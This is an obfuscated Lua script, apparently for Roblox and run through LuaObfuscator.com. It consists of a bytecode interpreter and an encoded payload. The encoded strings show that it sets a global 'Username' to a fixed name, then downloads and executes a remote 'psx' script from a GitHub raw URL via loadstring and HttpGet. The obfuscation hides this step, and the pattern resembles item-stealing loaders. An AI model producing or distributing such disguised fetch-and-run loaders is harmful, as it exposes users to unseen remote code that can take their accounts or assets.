--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.1) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (v0==4) then v13=select;v14=unpack or table.unpack;v15=tonumber;v0=5;end if (v0==1) then v4=string.sub;v5=string.gsub;v6=string.rep;v0=2;end if (v0==0) then v1=tonumber;v2=string.byte;v3=string.char;v0=1;end if (5==v0) then v16=nil;v16=function(v22,v23,...)local v27=1;local v28;v22=v5(v4(v22,5),"..",function(v29)if (v2(v29,2)==79) then local v84=0;while true do if (v84==0) then v28=v1(v4(v29,1,1));return "";end end else local v85=0;local v86;while true do if (v85==0) then v86=v3(v1(v29,16));if v28 then local v112=v6(v86,v28);v28=nil;return v112;else return v86;end break;end end end end);local function v30(v31,v32,v33)if v33 then local v87=0 + 0;local v88;while true do if (v87==0) then v88=(v31/((5 -3)^(v32-(1 + 0))))%((2 + 0)^(((v33-(2 -1)) -(v32-(1 -(1376 -(528 + 848))))) + 1));return v88-(v88%(402 -(227 + 174)));end end else local v89=(7 -5)^(v32-(1453 -(1249 + 203)));return (((v31%(v89 + v89))>=v89) and ((74 -(33 + 40)) + 0)) or (0 + 0);end end local function v34()local v47=(864 -461) -((1970 -(853 + 759)) + 45);local v48;while true do if (v47==(0 + 0)) then v48=v2(v22,v27,v27);v27=v27 + 1 + 0;v47=1 -0;end if ((1 -(474 -(209 + 265)))==v47) then return v48;end end end local function v35()local v49=0 -0;local v50;local v51;while true do if (v49==(287 -(265 + (1094 -(8 + 1064))))) then v50,v51=v2(v22,v27,v27 + 1 + 1);v27=v27 + 2 + 0;v49=2 -1;end if (v49==(1 + 0)) then return (v51 * (518 -262)) + v50;end end end local function v36()local v52=0;local v53;local v54;local v55;local v56;while true do if (v52==(1502 -(459 + 408 + 634))) then return (v56 * (33182139 -16404923)) + (v55 * (16571 + 48965)) + (v54 * (29 + 227)) + v53;end if ((0 + 0)==v52) then v53,v54,v55,v56=v2(v22,v27,v27 + (660 -(508 + 149)));v27=v27 + 1 + 3;v52=(408 -161) -(189 + 57);end end end local function v37()local v57=v36();local v58=v36();local v59=3 -2;local v60=(v30(v58,3 -2,(146 -94) -32) * ((62 -(48 + 12))^(13 + 19))) + v57;local v61=v30(v58,2 + 19,31);local v62=((v30(v58,32)==1) and  -(2 -1)) or (1705 -(24 + 1680));if (v61==(1440 -(1348 + 92))) then if (v60==(0 + 0 + 0 + 0)) then return v62 * (0 -0);else v61=1 + 0;v59=1224 -(673 + 551);end elseif (v61==2047) then return ((v60==(0 + 0)) and (v62 * ((960 -(43 + 5 + 911))/(0 -0)))) or (v62 * NaN);end return v9(v62,v61-(2710 -1687)) * (v59 + (v60/(((3225 -(729 + 907)) -(1268 + 319))^(1756 -(848 + 856)))));end local function v38(v39)local v63;if  not v39 then v39=v36();if (v39==(0 + 0)) then return "";end end v63=v4(v22,v27,(v27 + v39) -(1 -0));v27=v27 + v39;local v64={};for v77=1, #v63 do v64[v77]=v3(v2(v4(v63,v77,v77)));end return v7(v64);end local v40=v36;local function v41(...)return {...},v13("#",...);end local function v42()local v65=0 + 0;local v66;local v67;local v68;local v69;local v70;local v71;local v72;local v73;while true do if (v65==(4 -1)) then v72=nil;v73=nil;v65=4;end if (v65==(0 + 0)) then v66=0 -0;v67=nil;v65=654 -(626 + 27);end if (v65==(33 -(15 + 16))) then v70=nil;v71=nil;v65=3;end if (v65==4) then while true do if (v66~=(703 -(112 + 588))) then else v73=nil;while true do local v113=0;local v114;while true do if (v113~=0) then else v114=0 -0;while true do if (1~=v114) then else if (v67==(1630 -(26 + 1602))) then local v120=0 + 0;local v121;while true do if (v120==0) then v121=0;while true do if (v121~=0) then else local v148=0;local v149;while true do if (v148==(0 + 0)) then v149=0;while true do if (v149==(0 + 0)) then local v174=0;while true do if (v174~=0) then else for v189=1,v72 do local v190=0;local v191;local v192;while true do if (v190==0) then local v200=0;while true do if (v200==(486 -(360 + 125))) then v190=1;break;end if (v200==0) then local v210=0;while true do if (v210~=(1 + 0)) then else v200=1;break;end if (v210==0) then v191=v34();v192=nil;v210=1;end end end end end if (v190~=(1 + 0)) then else if (v191==(647 -(602 + 44))) then v192=v34()~=(0 + 0);elseif (v191==(227 -(36 + 189))) then v192=v37();elseif (v191~=3) then else v192=v38();end v73[v189]=v192;break;end end end v71[1 + 2]=v34();v174=1553 -(1521 + 31);end if (1~=v174) then else v149=1623 -(770 + 852);break;end end end if ((1 + 0)==v149) then v121=1 + 0;break;end end break;end end end if (1~=v121) then else for v159=1 + 0,v36() do local v160=0;local v161;while true do if (v160~=(0 + 0)) then else v161=v34();if (v30(v161,1,1)~=(0 + 0)) then else local v175=0 + 0;local v176;local v177;local v178;while true do if (v175==2) then local v186=0 -0;while true do if (v186~=0) then else if (v30(v177,1 -0,343 -(218 + 124))~=1) then else v178[2]=v73[v178[2]];end if (v30(v177,2,1 + 1)==(1 -0)) then v178[3]=v73[v178[1 + 2]];end v186=263 -(251 + 11);end if (v186~=(1498 -(879 + 618))) then else v175=1889 -(1388 + 498);break;end end end if (v175==(12 -9)) then if (v30(v177,3,3)~=(1 + 0)) then else v178[4]=v73[v178[4]];end v68[v159]=v178;break;end if (1~=v175) then else v178={v35(),v35(),nil,nil};if (v176==(0 -0)) then local v195=0 + 0;local v196;local v197;local v198;while true do if ((912 -(407 + 504))~=v195) then else v198=nil;while true do if ((0 + 0)~=v196) then else v197=0;v198=nil;v196=39 -(37 + 1);end if ((1 + 0)==v196) then while true do if (v197~=(0 -0)) then else v198=0;while true do if (v198~=(0 + 0)) then else v178[3]=v35();v178[1716 -(531 + 1181)]=v35();break;end end break;end end break;end end break;end if (v195==(0 + 0)) then v196=0 + 0;v197=nil;v195=2 -1;end end elseif (v176==(1368 -(524 + 843))) then v178[3]=v36();elseif (v176==2) then v178[3]=v36() -(2^(860 -(498 + 346)));elseif (v176==(426 -(244 + 179))) then local v215=0 + 0;local v216;while true do if (v215~=0) then else v216=0 -0;while true do if (v216==0) then v178[2 + 1]=v36() -((1771 -(1156 + 613))^(1 + 15));v178[4]=v35();break;end end break;end end end v175=2;end if (v175~=(0 -0)) then else local v188=0;while true do if (v188==(0 -0)) then v176=v30(v161,5 -3,3);v177=v30(v161,4 + 0,6);v188=1 + 0;end if (v188~=(405 -(308 + 96))) then else v175=1 + 0;break;end end end end end break;end end end v67=5 -2;break;end end break;end end end if (v67~=1) then else local v122=258 -(139 + 119);local v123;while true do if (v122~=(0 -0)) then else v123=0;while true do if (v123~=1) then else v73={};v67=2;break;end if (v123~=0) then else local v150=0 + 0;while true do if (v150==(3 -2)) then v123=1;break;end if (v150~=(0 -0)) then else v71={v68,v69,nil,v70};v72=v36();v150=1 -0;end end end end break;end end end break;end if (0==v114) then local v118=0 -0;local v119;while true do if (v118==0) then v119=0;while true do if (v119~=(1570 -(894 + 675))) then else v114=1 + 0;break;end if (v119~=(0 -0)) then else if (v67==3) then local v151=0 -0;local v152;local v153;while true do if ((1 + 0)==v151) then while true do if (v152~=0) then else v153=0 + 0;while true do local v180=1951 -(1179 + 772);while true do if (v180~=(255 -(237 + 18))) then else if (v153~=(1102 -(615 + 486))) then else return v71;end if ((0 + 0)==v153) then local v199=0 -0;while true do if (v199~=(799 -(78 + 721))) then else for v211=1,v36() do v69[v211-1]=v42();end for v213=1,v36() do v70[v213]=v36();end v199=1;end if (v199==(1 + 0)) then v153=1;break;end end end break;end end end break;end end break;end if (v151==0) then v152=0;v153=nil;v151=1;end end end if ((0 + 0)~=v67) then else local v154=0;local v155;local v156;while true do if (v154~=(0 + 0)) then else v155=0;v156=nil;v154=2 -1;end if (v154==(1211 -(150 + 1060))) then while true do if (v155==(0 + 0)) then v156=0 -0;while true do if (v156==(1856 -(593 + 1263))) then v68={};v69={};v156=1;end if (v156~=(2 -1)) then else v70={};v67=1 + 0;break;end end break;end end break;end end end v119=1 + 0;end end break;end end end end break;end end end break;end if (v66~=(1566 -(845 + 721))) then else local v109=0;while true do if (v109~=1) then else v66=2 -1;break;end if (v109==0) then local v115=0;while true do if (v115==0) then v67=1513 -(366 + 1147);v68=nil;v115=1;end if (v115==1) then v109=1;break;end end end end end if (v66==(23 -(11 + 10))) then local v110=0;local v111;while true do if (v110~=(0 + 0)) then else v111=0;while true do if (v111==(4 -3)) then v66=3;break;end if (v111~=(614 -(33 + 581))) then else v71=nil;v72=nil;v111=1 + 0;end end break;end end end if (v66==(1470 -(1216 + 253))) then v69=nil;v70=nil;v66=2;end end break;end if (v65==(1 + 0)) then v68=nil;v69=nil;v65=1 + 1;end end end local function v43(v44,v45,v46)local v74=v44[1];local v75=v44[2];local v76=v44[3];return function(...)local v79=1;local v80= -1;local v81={...};local v82=v13("#",...) -1;local function v83()local v90=v74;local v91=v75;local v92=v76;local v93=v41;local v94={};local v95={};local v96={};for v100=1930 -(1257 + 673),v82 do if ((2704<(7044 -(12205 -7917))) and (v100>=v92)) then v94[v100-v92]=v81[v100 + (304 -(237 + (633 -(505 + 62))))];else v96[v100]=v81[v100 + 1 + 0];end end local v97=(v82-v92) + (84 -(43 + 40));local v98;local v99;while true do local v101=0;local v102;local v103;while true do if ((v101==(0 -0)) or (((1858 -(206 + 1142)) + 670)>((752 -(406 + 227)) + 3364))) then v102=0;v103=nil;v101=1;end if ((v101==(1 + 0)) or ((9 + 202)==(3069 -(1321 + 103)))) then while true do if ((v102==(1328 -(280 + 1048))) or ((1057 + 108 + 570)<499)) then v103=1580 -(1501 + 79);while true do if ((v103==(1 + 0)) or ((2933 -1615)>(3824 + 51))) then if (((1256 + 604)>645) and (v99<=(2 + 0 + 2))) then if (((3795 -(1431 + 111))<(2123 + 2870)) and (v99<=1)) then if (((699 + 1490)<(12070 -7781)) and (v99==(0 + 0))) then v79=v98[3 + 0];else do return;end end elseif (((1419 -(172 + 319))<(733 + 550)) and (v99<=(3 -1))) then for v132=v98[61 -(33 + 26)],v98[8 -5] do v96[v132]=nil;end elseif ((2194<3775) and (v99>(2 + 1))) then v96[v98[3 -1]]=v46[v98[475 -(146 + 326)]];else local v136=0;local v137;local v138;local v139;while true do if (((329 + 996)==(3273 -(818 + 1130))) and (v136==(1 + 0))) then v139=nil;while true do if (((7424 -5227)<(5939 -(899 + 65))) and (v137==1)) then while true do if ((v138==(0 -0)) or ((3014 + 1220)>(5072 -(380 + 82)))) then v139=v98[3 -1];v96[v139]=v96[v139](v14(v96,v139 + 1 + 0,v80));break;end end break;end if (((4918 -3328)>=(99 + 728)) and (v137==(591 -(425 + 166)))) then local v169=(3017 -(196 + 931)) -(216 + 1674);while true do if ((v169==(0 + 0)) or (4599<3064)) then v138=1517 -(49 + 1468);v139=nil;v169=1 + 0;end if (((2458 -(4 + 71))<(2599 + 954)) and (v169==1)) then v137=1;break;end end end end break;end if ((v136==(309 -(167 + 142))) or ((1617 + 1667)<1628)) then v137=0;v138=nil;v136=1 + 0;end end end elseif ((v99<=(1584 -(17 + 1560))) or (3770<=(84 + 1151))) then if ((v99<=5) or (4235<(3364 -1066))) then local v125=0;local v126;local v127;local v128;local v129;local v130;while true do if (((18335 -13495)==(13438 -8598)) and (v125==0)) then v126=728 -(135 + 593);v127=nil;v125=1 + 0;end if (((1338 + 596)<(2669 -(252 + 35))) and (v125==((429 -(332 + 90)) -5))) then v130=nil;while true do if ((1==v126) or (3811<=1972)) then local v163=0 -0;while true do if (((1963 + 1886)>=((3737 + 2937) -3563)) and (v163==1)) then v126=4 -2;break;end if ((286<(4724 -(320 + (616 -(157 + 29))))) and (0==v163)) then v80=(v129 + v127) -(1535 -(765 + 769));v130=(0 + 0) -0;v163=1;end end end if (((4780 -(834 + 308))>(601 -460)) and (v126==(0 -0))) then local v164=0 + 0;while true do if ((v164==(3 -(2 + 0))) or ((10694 -7890)<=(669 + 188))) then v126=1;break;end if (((3785 + 742)>4234) and ((0 + 0)==v164)) then v127=v98[2 + 0];v128,v129=v93(v96[v127](v14(v96,v127 + 1 + (0 -0),v98[3])));v164=(995 + 484) -(989 + 489);end end end if ((v126==(2 + 0)) or (((104 + 2879) -1898)==3340)) then for v165=v127,v80 do local v166=0 -(693 -(641 + 52));local v167;local v168;while true do if (((4925 -(536 + 784))==((7079 -4295) + 821)) and (v166==(1296 -(602 + 694)))) then v167=0 -0;v168=nil;v166=1;end if (((153 -(148 + 3 + 1))==v166) or ((833 + 789)>=4084)) then while true do if (((1033 + 3840)>((4927 -3034) -736)) and (v167==(0 + 0))) then v168=(876 -(722 + 154)) + 0;while true do if (((4057 -(1654 + 149 + 93))>=1776) and (v168==((540 -(9 + 531)) -0))) then v130=v130 + (2 -1);v96[v165]=v128[v130];break;end end break;end end break;end end end break;end end break;end if (((3442 -2181)>(136 + (1255 -(357 + 702)))) and (v125==((1396 -(723 + 670)) -2))) then v128=nil;v129=nil;v125=2;end end elseif (((2262 -1440)>=(16 + 253)) and (v99>(6 + 0))) then v96[v98[1 + 1]][v98[1491 -(919 + 569)]]=v98[8 -4];elseif (((1981 -(808 + 672))<=(5882 -((1657 -871) + 140))) and (v96[v98[1 + 1]]==v98[17 -13])) then v79=v79 + 1 + 0;else v79=v98[3 + 0];end elseif ((v99<=(1713 -(437 + 507 + 761))) or ((721 + 947)>=(379 + 224 + 2228))) then v96[v98[2 + 0]]();elseif ((v99>(1880 -(121 + 1750))) or ((3593 + 1037)==(362 + 2590))) then v96[v98[4 -2]]=v98[5 -2];else local v144=0 + 0;local v145;local v146;local v147;while true do if ((v144==(0 -0)) or ((792 -(178 + 37))>=(2179 -(441 + 677)))) then v145=0 + 0;v146=nil;v144=1 -0;end if (((2250 -(400 + 73))<(5234 -(659 + (1907 -(308 + 899))))) and (v144==(1686 -(1206 + 479)))) then v147=nil;while true do if ((v145==(995 -(724 + 271))) or ((1267 + 3357)<(5654 -(235 + 1197)))) then local v170=0 -0;while true do if ((1716>=(365 + 94 + 114)) and (v170==(1365 -(418 + 946)))) then v145=(432 + 184) -(48 + 567);break;end if ((v170==(0 -0)) or (399>=(3051 -(265 + 309)))) then v146=v98[2 + 0];v147=v96[v98[10 -7]];v170=1 + 0;end end end if ((v145==((1271 + 258) -(1313 + 215))) or (4269<=1056)) then v96[v146 + (1229 -(560 + 668))]=v147;v96[v146]=v147[v98[114 -(45 + 65)]];break;end end break;end end end v79=v79 + 1;break;end if (((2493 -(48 + 60))>(4899 -3052)) and (((0 -0) + 0)==v103)) then local v116=1400 -(1121 + 103 + 176);local v117;while true do if (((9276 -5816)==(3195 + 265)) and ((0 -0)==v116)) then v117=0 + 0;while true do if ((((2535 -(180 + 423)) -(626 + 1305))==v117) or ((10 + 3458 + 881)>(12382 -7573))) then v103=3 -(259 -(232 + 25));break;end if ((v117==(860 -(271 + 589))) or ((7539 -4749)<=((1781 -(119 + 1259)) -114))) then local v131=(1563 -(536 + 550)) -(252 + 225);while true do if (((4420 -(433 + 145))>(4181 -(1663 + 3 + 58))) and (v131==(1 -0))) then v117=1 + 0;break;end if ((v131==(1772 -(164 + 1608))) or ((2279 + 2561)<(2377 + 2014))) then v98=v90[v79];v99=v98[(1 -0) -0];v131=1 + 0;end end end end break;end end end end break;end end break;end end end end A,B=v41(v12(v83));if  not A[1] then local v104=v44[4][v79] or "?";error("Script error at ["   .. v104   .. "]:"   .. A[2]);else return v14(A,2,B);end end;end return v43(v42(),{},v23)(...);end;v16("LOL!083O00028O0003023O005F4703083O00557365726E616D6503073O00637265612O6B7A030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033C3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F526973686965732F7073782F6D61696E2F70737873637269707400153O00120A3O00014O0002000100013O0026063O00020001000100044O0002000100120A000100013O002606000100050001000100044O00050001001204000200023O003007000200030004001204000200053O001204000300063O00200900030003000700120A000500084O0005000300054O000300023O00022O000800020001000100044O0014000100044O0005000100044O0014000100044O000200012O00013O00017O00153O00023O00033O00053O00053O00063O00083O00083O00093O00093O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000B3O000C3O000E3O000F3O00113O00",v10(),...);break;end if (v0==2) then v7=table.concat;v8=table.insert;v9=math.ldexp;v0=3;end if (v0==3) then v10=getfenv or function()return _ENV;end;v11=setmetatable;v12=pcall;v0=4;end end end
